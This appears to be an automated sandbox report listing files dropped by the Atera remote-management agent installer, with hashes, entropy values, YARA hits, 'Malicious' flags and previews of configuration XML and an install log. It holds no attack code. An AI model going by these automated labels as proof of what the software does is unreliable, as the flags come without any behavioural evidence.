                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):59944
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.1324471704124885
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:Q6O442hHI1kIHLxnuFjBm+UuLcxVePk+CXVT+rB9ezGREpYi60j1W:Q6O4JuxnT+UuLMcBClyrvGGa76x
                                                                                                                                                                                                                                                                                              MD5:FCE223AEDBE5FDFD5D1AF1F407A7E457
                                                                                                                                                                                                                                                                                              SHA1:006331AAFD0898E17D7F873F81786DFFAD1171FB
                                                                                                                                                                                                                                                                                              SHA-256:F4AE472EF2A816DD53F9A08A7E4C2604470FAD1C9F570BD6BBCA2E2EE7D31AE5
                                                                                                                                                                                                                                                                                              SHA-512:3B6D1F6A844FB90BBEDDBAC9CBEE9BBD6B9E0E737E8DEBD3647AF20982B2D61622E708D7555800A15C1BE874BBBC2476A8F775B7D60F58E14C8798E925C202C6
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1191
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.971943087661362
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:JduPF7NhOXrRH2/dVQ7uH2/FVxlPH2/FV0PH2/+w39y:327O7RgdSagFjdgFsg+w3w
                                                                                                                                                                                                                                                                                              MD5:B8E88B1C181AFEB535BFEA1155000E8E
                                                                                                                                                                                                                                                                                              SHA1:EB9066E96542DCE5F35DBF2F1424FD79ACEBB65F
                                                                                                                                                                                                                                                                                              SHA-256:5D094CC46FED5173A2B1BE4C8E5DBDB658D2C14ABD367C47DFC6F6EABD5F295C
                                                                                                                                                                                                                                                                                              SHA-512:58459651D3358FDDD4114AB569786A2306338C08D27D3D449BE2084EAE9D4A619C5650D3699DCA6702AEFDE8F9E77FD9E56C87EF51D4A8CCB2A22A378C488C37
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):23080
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.4987430748917925
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:8LOGTOwM15TRwLm6or29Nyb8E9VF6IYijSJIVxyy1So:8nMTR0Pa25EpYi60H
                                                                                                                                                                                                                                                                                              MD5:78E552CDB4CB2B0DE7A1CEF209C90CE0
                                                                                                                                                                                                                                                                                              SHA1:26CA5C6511B224CF02BB1C0DC1B4579C268E4B30
                                                                                                                                                                                                                                                                                              SHA-256:0FF7666BB20911A83680B6C1FF02341A503B347AE020434997580F5B2F2C29A2
                                                                                                                                                                                                                                                                                              SHA-512:9D0FE6D3580B5D5CBA458CBF6C4AEDE62C3DD107D72A13805F605AC0674AB6130B669AAA4E96069C64F24523C7477BBA575C813011E2443108B7DCE33268004C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1817640
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.551365167856295
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:49152:d9EeNSPwEW3cFSI4Tfm3hvbHsjAJcAMkPR:d9Nzm31PMoR
                                                                                                                                                                                                                                                                                              MD5:0E488B8F6A93F0148C1CD10588FA3BE1
                                                                                                                                                                                                                                                                                              SHA1:4480B6DE0CE67A9DFC4CF70BBB00C8336629BBA7
                                                                                                                                                                                                                                                                                              SHA-256:BFC17FCA01C65C1E5B32ED0225B354D9613764A3A51DF5B1C464031608D97179
                                                                                                                                                                                                                                                                                              SHA-512:5D48FC54948C4FB80E0C506554F140476CEB6901BC9A1D11A577C2C6293415C1F69DE420E36E8840BDD8B5372F45A4DC8E2BBAC5CE21643A497CE77D925826EE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1436200
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.78131691404635
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24576:as5ThI+vIjDEzn7tcBGtYnxLbdVlRdouD5RawYkGq78Yr4i9YE1tOvhefHXCvEsB:hlI+vIjE7mjOuKa8Riy+gvhaIn2+0y
                                                                                                                                                                                                                                                                                              MD5:7C0A2478D0C82CAE07C4435E29A10D4C
                                                                                                                                                                                                                                                                                              SHA1:DEA183C555F7DC655EF9A67CCF887F4529059E4A
                                                                                                                                                                                                                                                                                              SHA-256:68DADEE50F471C04AEF8C9498997F7E7E60100C4D0047784C47F9E8C9BA287C1
                                                                                                                                                                                                                                                                                              SHA-512:6F30F47F6AA27418025A4325604D7EC6931B73544D86705532DAFB8AAEA153DCAE63F58AB51FF49DC7A572B4B38E7BD0AEF2C3CB82C33CE8542DD4D17099AAA5
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):584433
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9996007806235445
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:12288:AaPKah+cOqB7YBiq57hmRYB2Vb7mde3FV/ruWIwUhA2yaJ4Gi1Cx/cL:xiBiqIYQF7/7ruQWA2Xxi1wS
                                                                                                                                                                                                                                                                                              MD5:B50834694383960830CF48D9836E1108
                                                                                                                                                                                                                                                                                              SHA1:ADC80813181B98A8296BEFA2960A55F939F3BFEE
                                                                                                                                                                                                                                                                                              SHA-256:370A259808052366888284B0CC4C91FF8F23E8008003959B8D0EFB1ADBF00CD6
                                                                                                                                                                                                                                                                                              SHA-512:F87BE933E87275B000BE031AA5DF7536DFD5FE9B99A607CE0904F206E074D3A0687A00654B9B78EDAA2FCCF3D30526E0EE5BD7DCBA4A5DAAFD6FC60EEAAA15C5
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):57896
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.807323990997079
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:rNvSjQvTQYc1IY1OwcujXQft0k5df9bq76In:rRSjQvMYcSIJcuMftH5d1bqL
                                                                                                                                                                                                                                                                                              MD5:E9794F785780945D2DDE78520B9BB59F
                                                                                                                                                                                                                                                                                              SHA1:293CAE66CEDBC7385CD49819587D3D5A61629422
                                                                                                                                                                                                                                                                                              SHA-256:0568E0D210DE9B344F9CE278291ACB32106D8425BDD467998502C1A56AC92443
                                                                                                                                                                                                                                                                                              SHA-512:1A3C15E18557A14F0DF067478F683E8B527469126792FAE7B78361DAD29317FF7B9D307B5A35E303487E2479D34830AA7E894F2906EFFF046436428ADA9A4534
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):535
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.076084597400077
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:MMHdG3VO3rdZRLNFF7ap+5v5OXrRf/2//FicYo4xm:JdfrdDPF7NhOXrRH2/d9r
                                                                                                                                                                                                                                                                                              MD5:D505E3DE03F172FA2B246E210054C5F7
                                                                                                                                                                                                                                                                                              SHA1:F5A480F56F760EEBA3B29108387E54D70A721127
                                                                                                                                                                                                                                                                                              SHA-256:A568F933F09B1AD1EE5E88DDCFFA1FE5921D18B73477136E1FAEE55F2BEF399A
                                                                                                                                                                                                                                                                                              SHA-512:80F01447B43525DBDF5B283522FE14D9AECEF16E55EA3FE36DC0A94B53C49E03BB56136F0911C348FB78FB5AF6112B1DE7C38CBFFBD73ACB2971655EF1B2B859
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):12
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhXSnn:WBe
                                                                                                                                                                                                                                                                                              MD5:39DF0BC698F203A4FEF18A68A7B0EADC
                                                                                                                                                                                                                                                                                              SHA1:0EA8D556AF659E0C8D6406B5B3E7E56EE6A10188
                                                                                                                                                                                                                                                                                              SHA-256:F8DD3CEC3612C302B45EA9539002625E58E528A5CB68B4B0E6C3C2A378122C1A
                                                                                                                                                                                                                                                                                              SHA-512:E6FF51381293BFD52EAE39B9868968A76D94BC993BAD5566C532A30E5EE5FE121C2F5B8EAED7ACEE59E3F6B8C1B3BEBB53B07B46F572F3498B1800B0DEAC128D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=27.6
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):96808
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.179305078416296
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:nJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvO1762y9:nQUm2H5KTfOLgxFJjE50vksVUfPvO1c9
                                                                                                                                                                                                                                                                                              MD5:BE16D0F73D33053C3817894C955BFA43
                                                                                                                                                                                                                                                                                              SHA1:6B79C7034EE0E4DBC4B90ADC3B47BF395CAE052D
                                                                                                                                                                                                                                                                                              SHA-256:434EA180FF3960ADF251CF34B8333A1BD70EAA7BDF42279317F2ECD7B7CCEAEB
                                                                                                                                                                                                                                                                                              SHA-512:6F08EC35E1D194328CD923FC22C6BBAFB072497ABA03DAC59F8E78C99D2CC3C87237CC5178CFEBA52078AC729286B8221FD7A8CD676A5A49D2879C553DAB332A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):186408
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.933461189028906
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:mkfZS7FUguxN+77b1W5GR69UgoCaf8/BCnfKlRUjW01KyFxYV:g+c7b1W4R6joxfQ8Y
                                                                                                                                                                                                                                                                                              MD5:7989DFD7A0AF54F59AD5C3E483A66CF6
                                                                                                                                                                                                                                                                                              SHA1:4F323F2E5174A789A31068DD76355447DB61AFFB
                                                                                                                                                                                                                                                                                              SHA-256:0E47E3F0432060BAE79988A622AAB4334328F85FE443D764D4C81D94C9F3DBAE
                                                                                                                                                                                                                                                                                              SHA-512:757182DF2492B66E06AA3B1854DAB487BB512FC5FBCE869CA4265218F5889D2D5B3748C2FC5B458FA148D10F3F5B61028DCA9B789F6766689BA1A24E9BE06936
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):331816
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.168523582236471
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:ZBhhiUWKJzPZNRntAXIjxs2f5Jg53XWlvidurmdIq8KmefViYkJTVBXi3VaKtNTk:ZDMUWITZznu85k8Wdn8KmCjIFi3VvY
                                                                                                                                                                                                                                                                                              MD5:41E6FC15337B1F2F556E3DE56D0DB476
                                                                                                                                                                                                                                                                                              SHA1:EF8EAAC6EF9B00383B48762773A5110D7C2F3EEA
                                                                                                                                                                                                                                                                                              SHA-256:81D43F8C0726143F28A33390B78E540C75F48733C3518B9D605C2E52AC0554C4
                                                                                                                                                                                                                                                                                              SHA-512:56956F6BBB56BF481B1434ADC0D37303065206FC4ECA8787B6EC8CD089D7C619875C62BBD282F5F0D9A69820937651968CC343CF5AE251B08345997BDD0555C7
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710184
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.960700401761297
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:NBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUD:NBjk38WuBcAbwoA/BkjSHXP36RMG+
                                                                                                                                                                                                                                                                                              MD5:2CFBB3EA34E3EAEFB478A1C0BF00190D
                                                                                                                                                                                                                                                                                              SHA1:A9298FD5C46D97C296E06B9D9D4034C2EC657D57
                                                                                                                                                                                                                                                                                              SHA-256:34FFBC77AEA4058D6B4EF621815B5C56EDD35585888FBCC2DE10E7B176EE3A3A
                                                                                                                                                                                                                                                                                              SHA-512:DA46D62BB6466E9B8DF21E75C594C06CBF3D79C8FE6038469B74F6562CCA9B38A482F386034F7B3C0D9DEEA6C5D0420AFE0EA08E59B1BBDA1C07B866D9F0B352
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):55848
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.238377987704794
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:SREoc0f5k1KlLoz0WOySMEpnSO7iX16UJKdiYpxDEpYi60WLS:SR8+5k15z0WBZEtgwJx876FG
                                                                                                                                                                                                                                                                                              MD5:2FB2CD6CC7C0B40202165C2ACF27F3FC
                                                                                                                                                                                                                                                                                              SHA1:D3125C28C46AD0083EA1EB65EAE6FA077908D985
                                                                                                                                                                                                                                                                                              SHA-256:4E83AE51D18FABA26E8B1315C199AF46DF7A1AFB18390DB30337679DF54A7812
                                                                                                                                                                                                                                                                                              SHA-512:C84CB5DE47798E6F0459BE87BCBA514FC14531F361909A2B81CFD6B477206B75C9F0F338C1477BF9A87BB7D08ACFEB99342EC5C9F1535F510BE742A27B5ED099
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):602672
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.145404526272746
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:UShQrHBJEwJiIJJ8TihsEWdzs29glRleqn4uRTJgwhVHhoNw0r17K7DDaiC3KM+9:gHDxJGihsEKwSuTuwvOWgFA
                                                                                                                                                                                                                                                                                              MD5:17D74C03B6BCBCD88B46FCC58FC79A0D
                                                                                                                                                                                                                                                                                              SHA1:BC0316E11C119806907C058D62513EB8CE32288C
                                                                                                                                                                                                                                                                                              SHA-256:13774CC16C1254752EA801538BFB9A9D1328F8B4DD3FF41760AC492A245FBB15
                                                                                                                                                                                                                                                                                              SHA-512:F1457A8596A4D4F9B98A7DCB79F79885FA28BD7FC09A606AD3CD6F37D732EC7E334A64458E51E65D839DDFCDF20B8B5676267AA8CED0080E8CF81A1B2291F030
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):73264
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.954475034553661
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq:67N1r9KGI04CCARLq
                                                                                                                                                                                                                                                                                              MD5:F4D9D65581BD82AF6108CFA3DD265A9A
                                                                                                                                                                                                                                                                                              SHA1:A926695B1E5D3842D8345C56C087E58845307A16
                                                                                                                                                                                                                                                                                              SHA-256:A3219CD30420EBCF7507C9C9F92FD551AE19999BE247CAA861A8A22D265BE379
                                                                                                                                                                                                                                                                                              SHA-512:144C1195A440907592B22FC947F4284CA36869BDAE495EC8CA5212AF4F63E8E8492FB0EC3B37BF66DB912AF30864C69588D0E35ED9B3D24D36DF3B09DDB5B6C3
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):753
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.853078320826549
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:qLLYem7haYNem7hcomf3em7hUQLtygXnC9xkKxeCsx/Yem7haYNem7hcomf3em7B:qLUVhzVhM3VhdLtXXIxkKxeCsOVhzVhY
                                                                                                                                                                                                                                                                                              MD5:8298451E4DEE214334DD2E22B8996BDC
                                                                                                                                                                                                                                                                                              SHA1:BC429029CC6B42C59C417773EA5DF8AE54DBB971
                                                                                                                                                                                                                                                                                              SHA-256:6FBF5845A6738E2DC2AA67DD5F78DA2C8F8CB41D866BBBA10E5336787C731B25
                                                                                                                                                                                                                                                                                              SHA-512:CDA4FFD7D6C6DFF90521C6A67A3DBA27BF172CC87CEE2986AE46DCCD02F771D7E784DCAD8AEA0AD10DECF46A1C8AE1041C184206EC2796E54756E49B9217D7BA
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.Installing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..Installing service AteraAgent.....Service AteraAgent has been successfully installed...Creating EventLog source AteraAgent in log Application.....Committing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (7463), with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):7466
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1606801095705865
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:R3DrP/zatgCnNjn1x62muDr9aHmzcv/65m7JDcm0BefnanGEkn56vT4ZvR++JDr+:NexdYX7OSRjXsaA0Ndhi
                                                                                                                                                                                                                                                                                              MD5:362CE475F5D1E84641BAD999C16727A0
                                                                                                                                                                                                                                                                                              SHA1:6B613C73ACB58D259C6379BD820CCA6F785CC812
                                                                                                                                                                                                                                                                                              SHA-256:1F78F1056761C6EBD8965ED2C06295BAFA704B253AFF56C492B93151AB642899
                                                                                                                                                                                                                                                                                              SHA-512:7630E1629CF4ABECD9D3DDEA58227B232D5C775CB480967762A6A6466BE872E1D57123B08A6179FE1CFBC09403117D0F81BC13724F259A1D25C1325F1EAC645B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?><ArrayOfKeyValueOfanyTypeanyType xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:x="http://www.w3.org/2001/XMLSchema" z:Id="1" z:Type="System.Collections.Hashtable" z:Assembly="0" xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><LoadFactor z:Id="2" z:Type="System.Single" z:Assembly="0" xmlns="">0.72</LoadFactor><Version z:Id="3" z:Type="System.Int32" z:Assembly="0" xmlns="">2</Version><Comparer i:nil="true" xmlns="" /><HashCodeProvider i:nil="true" xmlns="" /><HashSize z:Id="4" z:Type="System.Int32" z:Assembly="0" xmlns="">3</HashSize><Keys z:Id="5" z:Type="System.Object[]" z:Assembly="0" z:Size="2" xmlns=""><anyType z:Id="6" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">_reserved_nestedSavedStates</anyType><anyType z:Id="7" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/20
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):145968
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.874150428357998
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:bk/SImWggsVz8TzihTmmrG/GOXYsqRK3ybTXzpUTQM9/FMp:ISWB/YrRK3yb37
                                                                                                                                                                                                                                                                                              MD5:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                                                                              SHA1:E9AA4E6C514EE951665A7CD6F0B4A4C49146241D
                                                                                                                                                                                                                                                                                              SHA-256:A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                                                                                                                                                                                                                                                                                              SHA-512:23F3BD44A5FB66BE7FEA3F7D6440742B657E4050B565C1F8F4684722502D46B68C9E54DCC2486E7DE441482FCC6AA4AD54E94B1D73992EB5D070E2A17F35DE2F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
